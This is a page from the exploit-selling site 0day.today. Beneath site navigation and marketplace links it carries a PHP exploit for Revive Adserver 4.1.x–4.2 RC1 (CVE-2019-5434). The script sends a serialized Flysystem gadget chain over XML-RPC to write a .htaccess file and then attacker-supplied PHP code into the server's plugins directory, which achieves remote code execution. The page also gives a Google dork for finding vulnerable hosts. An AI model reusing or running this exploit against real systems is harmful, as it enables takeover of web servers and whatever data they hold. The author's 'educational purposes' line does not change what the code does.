0day.today - Biggest Exploit Database in the World.
![](/img/logo_green.jpg)
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earnGOLD
Administration of this site uses the official contacts. Beware of impostors!
![We DO NOT use Telegram or any messengers / social networks!](/img/no_telegram_big.png)
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Revive Adserver 4.2 - Remote Code Execution Exploit
Author
Risk
![](/img/risk/critlow_4.gif)
Security Risk Critical
]0day-ID
Category
Date add
CVE
Platform
# Exploit Title: Revive Adserver 4.2 - Remote Code Execution # Google Dork: "inurl:www/delivery filetype:php" # Exploit Author: crlf # Vendor Homepage: https://www.revive-adserver.com/ # Software Link: https://www.revive-adserver.com/download/archive/ # Version: 4.1.x <= 4.2 RC1 # Tested on: *nix # CVE : CVE-2019-5434 # Сontains syntax error for protection against skids <?php # Revive Adserver 4.1.x <= 4.2 RC1 PHP Object Injection to Remote Code Execution (CVE-2019-5434) # coded by @crlf, with love for antichat.com # special thanks to @Kaimi :) # the script should be used only for educational purposes! namespace{ (!isset($argv[2]) ? exit(message('php '.basename(__FILE__).' https://example.com/adserver-dir/ \'<?php phpinfo(); ?>\'')) : @list($x, $url, $code) = $argv); $source = 'data:text/html;base64,'.base64_encode('#'); $destination = 'plugins/.htaccess'; #$destination = 'var/.htaccess'; if(!strpos(request($url, $source, $destination), 'methodResponse')) exit(message('failed, no valid response from '.$url)); $source = 'data:text/html;base64,'.base64_encode($code); $destination = 'plugins/3rdPartyServers/ox3rdPartyServers/doubleclick.class.php'; #$destination = 'var/default.conf.php'; request($url, $source, $destination); message('check '.$url.$destination); function request($url, $source, $destination){ $what = serialize( ['what' => new Pdp\Uri\Url( new League\Flysystem\File( $destination, new League\Flysystem\File( 'x://'.$source, new League\Flysystem\MountManager( new League\Flysystem\Filesystem( new League\Flysystem\Config, new League\Flysystem\Adapter\Local('') ), new League\Flysystem\Plugin\ForcedCopy ) ) ) ) ] ); $what = str_replace(['\Uri\Url\00'],['\5CUri\5CUrl\00'], str_replace(['s:', сhr(0)],['S:', '\\00'], $what)); $xml = '<?xml version="1.0" encoding="ISO-8859-1"?> <methodCall> <methodName>openads.spc</methodName> <params> <param> <value> <struct> <member> <name>remote_addr</name> <value>8.8.8.8</value> </member> <member> <name>cookies</name> <value> <array> </array> </value> </member> </struct> </value> </param> <param><value><string>'.$what.'</string></value></param> <param><value><string>0</string></value></param> <param><value><string>dsad</string></value></param> <param><value><boolean>1</boolean></value></param> <param><value><boolean>0</boolean></value></param> <param><value><boolean>1</boolean></value></param> </params> </methodCall>'; return file_get_contents($url.'adxmlrpc.php', false, stream_context_create( ['http' => ['method' => 'POST', 'user_agent' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0', 'header' =>'Content-type: application/x-www-form-urlencoded', 'content'=> $xml ] ]) ); } function message($str){ print PHP_EOL.'### '.$str.' ###'.PHP_EOL.PHP_EOL; } } namespace League\Flysystem\Plugin{ class ForcedCopy{} } namespace League\Flysystem{ class Config{ protected $settings = []; public function __construct(){ $this->settings = ['disable_asserts' => true]; } } class Filesystem{ protected $adapter; protected $config; public function __construct($config,$adapter){ $this->config = $config; $this->adapter = $adapter; } } class MountManager{ protected $filesystems = []; protected $plugins = []; public function __construct($filesystem, $handler){ $this->filesystems = ['x' => $filesystem]; $this->plugins = ['__toString' => $handler]; } } class File{ protected $path; protected $filesystem; public function __construct($path, $obj){ $this->filesystem = $obj; $this->path = $path; } } } namespace League\Flysystem\Adapter{ class Local{ protected $pathPrefix; public function __construct($prefix){ $this->pathPrefix = $prefix; } } } namespace Pdp\Uri{ class Url{ private $host; public function __construct($file){ $this->host = $file; } } } # 0day.today [2024-06-24] #